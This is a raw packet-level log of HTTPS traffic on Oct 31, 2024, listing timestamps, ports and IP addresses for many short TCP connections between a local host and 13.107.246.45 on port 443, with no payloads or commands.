Oct 31, 2024 19:20:42.652568102 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.652579069 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.811578989 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.811655998 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.811798096 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.812088013 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.812129021 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.812150002 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.812155962 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.813873053 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.814364910 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.814376116 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.814738035 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.814743996 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.815438032 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.815481901 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.815557957 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.815830946 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.815846920 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.832194090 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.832566023 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.832575083 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.832987070 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.832992077 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.960648060 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.960725069 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.960798025 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.961055994 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.961074114 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.961085081 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.961091042 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.964477062 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.964488983 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.964600086 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.964778900 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.964790106 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968061924 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968105078 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968148947 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.968158960 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968177080 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968219995 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.968379974 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.968388081 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.968391895 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.968396902 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.970578909 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.970623970 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.970696926 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.970839977 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.970855951 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.422933102 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.423557043 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.423582077 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.424053907 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.424060106 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.426688910 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.427196026 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.427221060 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.428138018 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.428143978 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.552913904 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.553107977 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.553178072 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.553385973 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.553385973 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.553400040 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.553409100 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.556576967 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.556611061 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.556700945 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.556883097 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.556891918 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.573132038 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.573199987 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.573344946 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.573493004 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.573506117 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.573518038 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.573523998 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.576222897 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.576275110 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.576365948 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.576514959 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.576528072 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.602042913 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.602643013 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.602660894 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.603153944 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.603158951 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.691356897 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.691973925 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.691989899 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.692507029 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.692511082 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.739737988 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.740217924 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.740226984 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.740701914 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.740705967 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.758941889 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.760036945 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.760088921 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.760094881 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.760138988 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.760178089 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.760188103 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.760200024 CET	51469	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.760205030 CET	443	51469	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.763113976 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.763134003 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.763206005 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.763350964 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.763364077 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.819088936 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.819158077 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.819216013 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.829123974 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.829139948 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.829152107 CET	51470	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.829155922 CET	443	51470	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.833420992 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.833466053 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.833520889 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.852986097 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.853029966 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.870675087 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.870764971 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.870812893 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.870812893 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.870861053 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.871062994 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.871071100 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.871083021 CET	51471	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.871087074 CET	443	51471	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.873852015 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.873866081 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:43.873939991 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.874079943 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:43.874090910 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.276484966 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.277216911 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.277246952 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.277728081 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.277734041 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.293840885 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.294477940 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.294507027 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.294898987 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.294905901 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.409163952 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.409487963 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.409539938 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.410245895 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.410269022 CET	51472	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.410271883 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.410274982 CET	443	51472	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.415508032 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.415554047 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.415632010 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.415966034 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.415978909 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.420308113 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.420334101 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.420384884 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.420387983 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.420428991 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.420636892 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.420656919 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.420667887 CET	51473	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.420674086 CET	443	51473	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.423962116 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.423990965 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.424056053 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.424324989 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.424336910 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.609498978 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.610084057 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.610105038 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.610635996 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.610641956 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.619210958 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.619724035 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.619750977 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.620199919 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.620207071 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.743613958 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.743714094 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.743796110 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.743978024 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.744002104 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.744019032 CET	51476	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.744024992 CET	443	51476	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.747230053 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.747282028 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.747384071 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.747517109 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.747530937 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.750222921 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.750289917 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.750339031 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.750471115 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.750487089 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.750498056 CET	51475	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.750504017 CET	443	51475	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.752676010 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.752686977 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:44.752747059 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.752866030 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:44.752880096 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.435566902 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.436249971 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.436288118 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.436796904 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.436801910 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.442733049 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.443125010 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.443137884 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.443613052 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.443618059 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.497680902 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.498276949 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.498313904 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.498723030 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.498730898 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.500576973 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.500824928 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.500845909 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.501163006 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.501168966 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.564363956 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.564909935 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.564920902 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.565517902 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.565521955 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.569679022 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.569741964 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.569808006 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.569983006 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.569993973 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.570003033 CET	51478	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.570009947 CET	443	51478	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.573170900 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.573205948 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.573306084 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.573492050 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.573507071 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574414015 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574487925 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574547052 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.574561119 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574608088 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574636936 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.574661016 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574672937 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.574672937 CET	51477	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.574681997 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.574687958 CET	443	51477	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.577215910 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.577229023 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.577323914 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.577476978 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.577491045 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.631614923 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.631679058 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.631731033 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.632031918 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.632045984 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.632056952 CET	51480	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.632061958 CET	443	51480	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635245085 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635279894 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635349989 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635397911 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635493040 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635519028 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635533094 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635540962 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635706902 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635706902 CET	51479	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.635725975 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.635735035 CET	443	51479	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.637790918 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.637824059 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.637893915 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.638029099 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.638041973 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.698333979 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.698422909 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.698482037 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.698700905 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.698709965 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.698723078 CET	51474	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.698728085 CET	443	51474	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.701668024 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.701704025 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:45.701764107 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.702203035 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:45.702218056 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.305864096 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.315289974 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.322978020 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.322993040 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.326813936 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.326827049 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.337331057 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.337346077 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.341020107 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.341031075 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.376327038 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.377939939 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.384213924 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.384226084 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.387459040 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.387465000 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.390954018 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.390964985 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.394701004 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.394706964 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.440826893 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.441348076 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.441364050 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.441869020 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.441874027 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.451065063 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.451205015 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.451277971 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.451462030 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.451462030 CET	51481	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.451482058 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.451493025 CET	443	51481	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.455488920 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.455523968 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.455607891 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.456001997 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.456028938 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.466926098 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.467181921 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.467324018 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.467474937 CET	51482	443	192.168.2.4	13.107.246.45
